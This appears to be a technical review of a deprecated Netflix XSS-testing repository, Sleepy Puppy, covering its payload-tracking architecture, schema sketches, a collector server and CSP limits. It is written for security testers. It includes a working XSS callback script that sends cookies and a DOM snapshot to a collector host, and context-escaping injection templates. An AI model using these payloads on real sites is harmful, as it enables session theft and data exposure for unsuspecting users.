
Sleepy Puppy: Netflix's Deprecated XSS Hunter and the Evolution of Enterprise Security Testing

Hook

Before Sleepy Puppy became an official Netflix open-source project, an engineer's personal GitHub repository held an early form of an idea that would change how large enterprises hunt for cross-site scripting vulnerabilities across thousands of applications at once.

Context

In the early 2010s, security teams at rapidly scaling tech companies faced an intractable problem: how do you systematically test for XSS vulnerabilities when you have hundreds of applications, thousands of input fields, and an infrastructure that changes daily? Traditional approaches required manually injecting payloads, checking each endpoint, and somehow tracking which test payload appeared where. At Netflix, where microservices proliferated and new features shipped continuously, this manual process was untenable.

The sbehrens/sleepy-puppy repository represents Scott Behrens' initial work on what would become Netflix's answer to this scaling problem. While the repository itself is deprecated and redirects users to the official Netflix/sleepy-puppy version, it offers a fascinating glimpse into how enterprise security tooling evolved from individual contributor projects into formalized open-source frameworks. The core innovation was simple but powerful: treat XSS payloads as trackable entities with unique identifiers, inject them across your application landscape, and wait for callbacks to tell you where they executed. This transformed XSS testing from a labor-intensive manual process into a scalable, data-driven operation.

Technical Insight

[Figure: System architecture (auto-generated). Components: Security Tester, Sleepy Puppy Web Interface, Sleepy Puppy Server, Payload Database, Target Application, Victim Browser, Callback Endpoint. Flow: create/manage payloads, store payload metadata, generate unique XSS payload, inject payload, execute script, log execution context, display results.]

Sleepy Puppy's architecture was built around one key separation: payload creation versus execution detection. At its center was a payload management server that generated unique XSS payloads embedding callback URLs. When one of these payloads executed in a victim browser, it phoned home with context about where and how the injection succeeded.

The fundamental pattern looked something like this:

<!-- Injected payload: loads a script whose filename is the unique payload ID -->
<script src="https://sleepy-puppy.internal/payload/abc123.js"></script>

// The callback script (abc123.js) might contain:
(function() {
  var data = {
    payload_id: 'abc123',
    url: window.location.href,
    cookies: document.cookie,  // HttpOnly cookies are not visible to scripts
    dom: document.documentElement.outerHTML.substring(0, 5000),
    referrer: document.referrer,
    user_agent: navigator.userAgent,
    timestamp: new Date().toISOString()
  };

  // Send execution context back to Sleepy Puppy as an image beacon (a GET request).
  // Note: a 5,000-character DOM excerpt grows considerably once URL-encoded and
  // can exceed browser or server URL length limits.
  var img = new Image();
  img.src = 'https://sleepy-puppy.internal/capture?' +
    Object.keys(data).map(function(k) {
      return encodeURIComponent(k) + '=' + encodeURIComponent(data[k]);
    }).join('&');
})();

This callback mechanism solved the attribution problem inherent in large-scale XSS testing. Without unique identifiers, discovering an XSS vulnerability weeks after injection meant forensic work to determine which test payload succeeded and where it was originally injected. Sleepy Puppy's payload tracking meant every successful execution automatically mapped back to specific assessments, testers, and application contexts.
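
To make the attribution step concrete, here is a minimal Python sketch of the server side, assuming callbacks arrive as a /capture query string like the beacon's. It parses the callback URL and joins it to the stored payload record. The names PayloadRecord, PAYLOADS, and attribute_capture, and the sample assessment and tester values, are hypothetical; an in-memory dict stands in for the real database.

```python
# Hypothetical sketch: attribute a callback to the payload and assessment that
# produced it. PAYLOADS stands in for the Payload/Assessment tables; all names
# and sample values are illustrative, not Sleepy Puppy's actual code.
from dataclasses import dataclass
from urllib.parse import parse_qs, urlsplit


@dataclass
class PayloadRecord:
    payload_id: str
    assessment: str
    created_by: str
    injected_into: str  # where the tester originally planted the payload


# Hypothetical registry, filled in when payloads are generated
PAYLOADS = {
    "abc123": PayloadRecord("abc123", "billing-portal-q3", "alice", "profile display name"),
}


def attribute_capture(callback_url: str) -> dict:
    """Parse a /capture?... callback URL and join it to its payload record."""
    query = parse_qs(urlsplit(callback_url).query)
    fields = {key: values[0] for key, values in query.items()}  # one value per key
    record = PAYLOADS.get(fields.get("payload_id", ""))
    if record is None:
        # Unknown ID: stale, forged, or from a payload created elsewhere
        return {**fields, "attributed": False}
    return {
        **fields,
        "attributed": True,
        "assessment": record.assessment,
        "tester": record.created_by,
        "injected_into": record.injected_into,
        "executed_on": fields.get("url"),
    }


result = attribute_capture(
    "https://sleepy-puppy.internal/capture?payload_id=abc123"
    "&url=https%3A%2F%2Fapp.example%2Fadmin%2Fusers"
)
print(result["assessment"], result["injected_into"], "->", result["executed_on"])
```

Keeping the injection location on the payload record, rather than expecting the callback to report it, is what lets a capture that arrives weeks later be traced back without forensic work: the callback only needs to carry the ID.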

The web interface provided CRUD operations for payload management, allowing security engineers to create payload collections targeted at different vulnerability classes: stored XSS, reflected XSS, DOM-based XSS, and even polyglot payloads designed to break out of multiple contexts. Each payload variant received a unique identifier, enabling A/B testing of different evasion techniques across the same application surface.
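
A rough Python sketch of how per-variant identifiers could be minted, assuming each variant targets a different HTML injection context and loads its callback script from a per-payload URL. The callback host, the three templates, and generate_payloads are illustrative assumptions, not the payloads Sleepy Puppy actually shipped.

```python
# Hypothetical sketch: one tracked payload per injection context. The callback
# host and templates are illustrative assumptions, not Sleepy Puppy's payloads.
import uuid

CALLBACK_HOST = "https://sleepy-puppy.internal"  # hypothetical collector origin

# Each template escapes a different HTML context before loading the callback
# script; {src} is replaced with a per-payload script URL.
TEMPLATES = {
    "html_body": '<script src="{src}"></script>',
    "quoted_attribute": '"><script src="{src}"></script>',
    "img_onerror": (
        '<img src=x onerror="var s=document.createElement(\'script\');'
        's.src=\'{src}\';document.body.appendChild(s)">'
    ),
}


def generate_payloads(assessment_id: str) -> list[dict]:
    """Return one payload per template, each with its own random ID."""
    payloads = []
    for context, template in TEMPLATES.items():
        payload_id = uuid.uuid4().hex  # unique per variant, so captures are attributable
        src = f"{CALLBACK_HOST}/payload/{payload_id}.js"
        payloads.append({
            "id": payload_id,
            "assessment_id": assessment_id,
            "context": context,
            "content": template.format(src=src),
        })
    return payloads


for p in generate_payloads("billing-portal-q3"):
    print(p["context"], p["content"])
```

Because every variant carries its own ID, a capture reports not only that an input is vulnerable but also which escape technique succeeded there, which is what makes side-by-side comparison of techniques possible.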

The database schema likely followed this pattern:

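# Simplified conceptual model (Flask-SQLAlchemy); not the project's actual schema
from datetime import datetime, timezone
from flask_sqlalchemy import SQLAlchemy

db = SQLAlchemy()

def utcnow():
    return datetime.now(timezone.utc)

class Assessment(db.Model):  # hypothetical parent table for the foreign key
    id = db.Column(db.String(36), primary_key=True)
    name = db.Column(db.String(255))

class Payload(db.Model):
    id = db.Column(db.String(36), primary_key=True)  # UUID embedded in callback URLs
    payload_content = db.Column(db.Text)
    assessment_id = db.Column(db.String(36), db.ForeignKey('assessment.id'))
    created_by = db.Column(db.String(255))
    created_at = db.Column(db.DateTime(timezone=True), default=utcnow)
    payload_type = db.Column(db.String(50))  # stored, reflected, dom

class Capture(db.Model):
    id = db.Column(db.Integer, primary_key=True)
    payload_id = db.Column(db.String(36), db.ForeignKey('payload.id'))
    url = db.Column(db.Text)
    captured_at = db.Column(db.DateTime(timezone=True), default=utcnow)
    cookies = db.Column(db.Text)  # only non-HttpOnly cookies reach the payload
    dom_snapshot = db.Column(db.Text)
    referrer = db.Column(db.Text)
    user_agent = db.Column(db.Text)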

What made this architecture particularly elegant for Netflix's use case was the decoupling of testing and monitoring. Security engineers could inject hundreds of payloads into staging environments, internal tools, or even production systems (with appropriate safeguards), then simply wait. The callback server ran continuously, capturing execution events asynchronously. This fire-and-forget model meant testing didn't block development workflows, and vulnerabilities revealed themselves over time as different code paths were exercised.
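
The always-on collector half of this model can be sketched with nothing but the Python standard library. This is a minimal illustration under stated assumptions: callbacks arrive as GET requests to a hypothetical /capture path, and an in-memory list guarded by a lock stands in for the Capture table. The handler answers with a 1x1 GIF so the beacon's image request completes normally.

```python
# Hypothetical sketch of an always-on collector for image-beacon callbacks.
# Stdlib only; the /capture path, field names, and in-memory CAPTURES list
# (standing in for the Capture table) are assumptions for illustration.
import base64
import threading
from datetime import datetime, timezone
from http.server import BaseHTTPRequestHandler, ThreadingHTTPServer
from urllib.parse import parse_qs, urlsplit

# 1x1 transparent GIF returned to the beacon's Image() request
PIXEL = base64.b64decode("R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7")
CAPTURES: list[dict] = []
LOCK = threading.Lock()


class CaptureHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        parts = urlsplit(self.path)
        if parts.path != "/capture":
            self.send_error(404)
            return
        fields = {k: v[0] for k, v in parse_qs(parts.query).items()}
        fields["received_at"] = datetime.now(timezone.utc).isoformat()
        with LOCK:  # requests are handled on separate threads
            CAPTURES.append(fields)
        self.send_response(200)
        self.send_header("Content-Type", "image/gif")
        self.send_header("Content-Length", str(len(PIXEL)))
        self.end_headers()
        self.wfile.write(PIXEL)

    def log_message(self, format, *args):
        pass  # silence per-request logging; CAPTURES is the record


def serve(port: int = 8000) -> ThreadingHTTPServer:
    """Start the collector on a background thread and return the server."""
    server = ThreadingHTTPServer(("127.0.0.1", port), CaptureHandler)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server
```

Calling serve() once and leaving it running mirrors the fire-and-forget model: nothing in the injection workflow waits on the collector, and captures simply accumulate whenever a payload fires.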

The system also enabled collaborative testing at scale. Multiple security engineers could create assessments, inject their payloads, and all captures would funnel into a centralized dashboard. This prevented duplicate testing and created institutional knowledge about which application areas were historically vulnerable, which payload techniques worked against specific frameworks, and how quickly vulnerabilities were being remediated.
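
As a rough illustration of the dashboard side, the Python sketch below rolls captures up by host and path, so historically vulnerable areas stand out, and lists which testers' payloads fired in each assessment. It assumes each capture has already been attributed and carries url, assessment, and tester fields; those field names and the sample data are hypothetical.

```python
# Hypothetical sketch of a dashboard roll-up: count captures per host and path
# so historically vulnerable areas stand out, and list which testers' payloads
# fired in each assessment. The capture fields are assumptions.
from collections import Counter, defaultdict
from urllib.parse import urlsplit


def summarize(captures: list[dict], top: int = 3) -> dict:
    by_location = Counter()
    testers = defaultdict(set)
    for capture in captures:
        parts = urlsplit(capture["url"])
        # Group by host and path, ignoring query strings such as ?id=1
        by_location[f"{parts.hostname}{parts.path}"] += 1
        testers[capture["assessment"]].add(capture["tester"])
    return {
        "hotspots": by_location.most_common(top),
        "testers_by_assessment": {a: sorted(t) for a, t in testers.items()},
    }


captures = [
    {"url": "https://admin.example/users?id=1", "assessment": "q3-internal", "tester": "alice"},
    {"url": "https://admin.example/users?id=2", "assessment": "q3-internal", "tester": "bob"},
    {"url": "https://help.example/ticket", "assessment": "q4-support", "tester": "alice"},
]
print(summarize(captures))
```

In the sample data, two testers' payloads firing on the same path is exactly the kind of overlap a shared dashboard makes visible before anyone spends more time on that page.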

Gotcha

The elephant in the room: this specific repository is completely deprecated and unmaintained. Scott Behrens himself redirects users to the official Netflix/sleepy-puppy repository, making this copy purely a historical artifact. Deploying this code would be foolhardy: you'd be running an outdated codebase with likely unpatched vulnerabilities in its aging dependencies (ironic for a security tool) and zero community support.

But even the official Netflix version has aged in ways that matter. Sleepy Puppy emerged in an era when Content Security Policy adoption was nascent and XSS detection tools were primitive. Modern web applications increasingly deploy CSP headers that block inline script execution and restrict script sources, rendering many traditional XSS payloads ineffective. Sleepy Puppy's callback mechanism relies on loading external JavaScript and exfiltrating data via image requests, and a strict CSP can block both: the script-src directive limits where scripts may load from, and img-src (falling back to default-src) limits where image requests may go. Additionally, the rise of JavaScript frameworks like React, Vue, and Angular, which provide built-in XSS protections through automatic escaping, has shifted the vulnerability landscape. Today's XSS bugs are more likely to involve CSP bypasses, DOM clobbering, or prototype pollution than simple script injection into HTML contexts. A tool designed for 2014's threat landscape requires significant adaptation for 2024's realities.
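
To show concretely why these callbacks are fragile, here is a deliberately simplified Python check of whether a page's CSP header would let a Sleepy Puppy-style payload load its external script and send its image beacon. It covers only a subset of CSP source matching ('self', 'none', *, scheme sources, exact origins, and *.host wildcards) and ignores nonces, hashes, 'strict-dynamic', script-src-elem, and path matching; parse_csp, source_allows, and callback_allowed are hypothetical names.

```python
# Simplified sketch: would a page's CSP let a Sleepy Puppy-style payload load
# its callback script and send an image beacon? Covers only a subset of CSP
# source matching; this is an illustration, not a CSP evaluator.
from urllib.parse import urlsplit


def parse_csp(header: str) -> dict[str, list[str]]:
    directives: dict[str, list[str]] = {}
    for part in header.split(";"):
        tokens = part.strip().split()
        if tokens:
            # If a directive repeats, the first occurrence wins
            directives.setdefault(tokens[0].lower(), tokens[1:])
    return directives


def source_allows(sources: list[str], url: str, page_origin: str) -> bool:
    target = urlsplit(url)
    origin = f"{target.scheme}://{target.netloc}"
    for source in (s.lower() for s in sources):
        if source == "'none'":
            continue
        if source == "*" or source == f"{target.scheme}:":
            return True
        if source == "'self'" and origin == page_origin:
            return True
        if source.startswith("*.") and (target.hostname or "").endswith(source[1:]):
            return True
        if source.rstrip("/") == origin:
            return True
    return False


def callback_allowed(header: str, callback_url: str, page_origin: str) -> dict[str, bool]:
    csp = parse_csp(header)
    fallback = csp.get("default-src")
    verdict = {}
    for directive in ("script-src", "img-src"):
        sources = csp.get(directive, fallback)
        # With neither the directive nor default-src, CSP does not restrict this load
        verdict[directive] = sources is None or source_allows(sources, callback_url, page_origin)
    return verdict


print(callback_allowed(
    "default-src 'self'; img-src *",
    "https://sleepy-puppy.internal/payload/abc123.js",
    "https://app.example",
))
```

In the sample call the external script is refused, so the beacon never gets a chance to run even though img-src * would have let the image request through.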

Verdict

Skip if: You're looking for actively maintained security tooling. This repository is deprecated and should not be deployed under any circumstances, and even for learning purposes the official Netflix/sleepy-puppy repository is the better choice. Skip it, too, if you need a modern XSS testing solution that understands CSP, SameSite cookies, and contemporary JavaScript frameworks.

Use if: You're researching the evolution of security engineering practices at high-scale tech companies or studying how open-source security projects emerge from individual engineering efforts. This repository serves as a historical marker showing how Netflix's security team approached systematic vulnerability testing before formalizing their open-source program.

For actual XSS testing, use XSS Hunter Express (the modern evolution of these concepts), integrate Burp Suite Collaborator for comprehensive out-of-band vulnerability detection, or contribute to the official Netflix/sleepy-puppy repository if you're committed to the centralized payload management approach. The real value of sbehrens/sleepy-puppy lies not in its code but in the architectural patterns it illustrates, which influenced a generation of security tooling and persist in modern bug bounty platforms and enterprise security frameworks.